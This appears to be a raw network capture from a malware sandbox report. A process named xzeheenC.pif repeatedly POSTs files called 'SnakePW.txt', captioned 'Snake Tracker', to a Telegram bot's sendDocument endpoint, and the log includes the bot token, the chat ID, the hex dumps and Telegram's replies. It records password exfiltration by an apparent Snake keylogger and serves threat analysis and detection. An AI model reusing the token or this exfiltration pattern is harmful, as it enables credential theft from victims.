                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:10 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 30 33 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 38 37 30 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419033,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535870,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        9192.168.2.849720149.154.167.2204437064C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:10 UTC352OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd1f4f156a80ed
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        Connection: Keep-Alive
                                                                                                        2024-12-18 15:31:10 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 66 34 66 31 35 36 61 38 30 65 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 31 3a 30 30 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd1f4f156a80edContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:31:00Client IP:
                                                                                                        2024-12-18 15:31:10 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:10 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:10 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 30 33 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 38 37 30 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419032,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535870,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        10192.168.2.849722149.154.167.2204436760C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:12 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd1fbdeca09ef1
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:12 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 66 62 64 65 63 61 30 39 65 66 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 33 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd1fbdeca09ef1Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
                                                                                                        2024-12-18 15:31:12 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:12 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:12 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 30 33 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 38 37 32 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419036,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535872,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        11192.168.2.849723149.154.167.2204436760C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:14 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd1fd27f95701a
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:14 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 66 64 32 37 66 39 35 37 30 31 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 33 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd1fd27f95701aContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
                                                                                                        2024-12-18 15:31:14 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:14 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:14 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 30 33 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 38 37 34 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419038,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535874,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        12192.168.2.849724149.154.167.2204433428C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:15 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd1f4f1d4d0647
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:15 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 66 34 66 31 64 34 64 30 36 34 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 35 33 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd1f4f1d4d0647Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
                                                                                                        2024-12-18 15:31:15 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:15 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:15 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 30 34 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 38 37 35 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419040,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535875,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        13192.168.2.849725149.154.167.2204436760C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:16 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd1fe85eef5b42
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:16 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 66 65 38 35 65 65 66 35 62 34 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 33 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd1fe85eef5b42Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
                                                                                                        2024-12-18 15:31:16 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:16 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:16 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 30 34 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 38 37 36 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419042,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535876,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        14192.168.2.849726149.154.167.2204433428C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:17 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd1f66d44105a7
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:17 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 66 36 36 64 34 34 31 30 35 61 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 35 33 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd1f66d44105a7Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
                                                                                                        2024-12-18 15:31:17 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:17 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:17 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 30 34 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 38 37 37 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419044,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535877,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        15192.168.2.849727149.154.167.2204436760C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:17 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd1ffccf134830
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:17 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 66 66 63 63 66 31 33 34 38 33 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 33 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd1ffccf134830Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
                                                                                                        2024-12-18 15:31:18 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:18 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
